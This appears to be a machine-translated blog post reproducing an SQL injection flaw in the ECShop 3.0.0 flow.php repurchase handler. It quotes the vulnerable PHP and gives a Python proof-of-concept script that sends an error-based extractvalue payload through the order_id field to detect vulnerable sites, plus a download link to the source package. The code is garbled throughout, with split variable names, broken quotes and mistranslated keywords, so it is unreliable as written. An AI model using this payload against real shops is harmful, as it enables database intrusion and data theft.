Bugscan on the loopholes, I reproduced a bit
Flow.php injected into the root directory
ElseIf($_request[' step '] = = ' Repurchase ') { include_once(' includes/cls_json.php '); $order _id=Strip_tags($_post[' order_id ']); $order _id= Json_str_iconv ($order _id); $db->query (' DELETE from ').$ecs->table (' cart '). "WHERE Rec_type =".cart_repurchase); $order _goods=$db->getall ("Select goods_id, Goods_number, goods_attr_id, parent_id from".$ecs->table (' Order_goods '). "WHERE order_id =".$order _id); $result=Array(' ERROR ' = 0, ' message ' = '); $json=NewJSON; foreach($order _goods as $goods) { $spec=Empty($goods[' goods_attr_id ']) ?Array() :Explode(‘,‘,$goods[' goods_attr_id ']); if(!addto_cart ($goods[' goods_id '],$goods[' Goods_number '],$spec,$goods[' parent_id '],cart_repurchase)) { $result=false; $result=Array(' Error ' = 1, ' message ' =$_lang[' Repurchase_fail ']); } } die($json->encode ($result));}
See these two sentences
$order _id = strip_tags ($_post[' order_id ');
$order _goods = $db->getall ("Select goods_id, Goods_number, goods_attr_id, parent_id from". $ecs->table (' Order_goods '). "WHERE order_id =". $order _id);
Found no filtering of order_id
We found that the single quotes were addslashes, but look at the code carefully
$order _goods = $db->getall ("Select goods_id, Goods_number, goods_attr_id, parent_id from". $ecs->table (' Order_goods '). "WHERE order_id =". $order _id);
found that order_id parameters do not need single quotes to inject
Direct injection
The injection was successful.
The verification POC is given below:
ImportRequestsdefcheck_vulnerable (check_url):ifCHECK_URL[-1] = ='/': URL= Check_url +'Flow.php?step=repurchase' elifCHECK_URL[-1]! ='/': URL= Check_url +'/flow.php?step=repurchase'Post_data= {"order_id":"order_id=1 or Extractvalue (1,concat (0X7E,MD5 (1)) or #"} res= Requests.post (url,data=post_data)ifRes.status_code = = 200 and 'c4ca4238a0b923820dcc509a6f75849' inchRes.text:returnTrueElse: returnFalseif __name__=='__main__': Check_url= Raw_input ("Input URL:") ifcheck_vulnerable (check_url):Print "It ' s vulnerable" Else: Print "It ' s not vulnerable"
By the way, share the source package to the friends who want to reproduce:
Https://pan.baidu.com/s/1c1Ldye8
ecshop3.0.0 release0518 SQL injection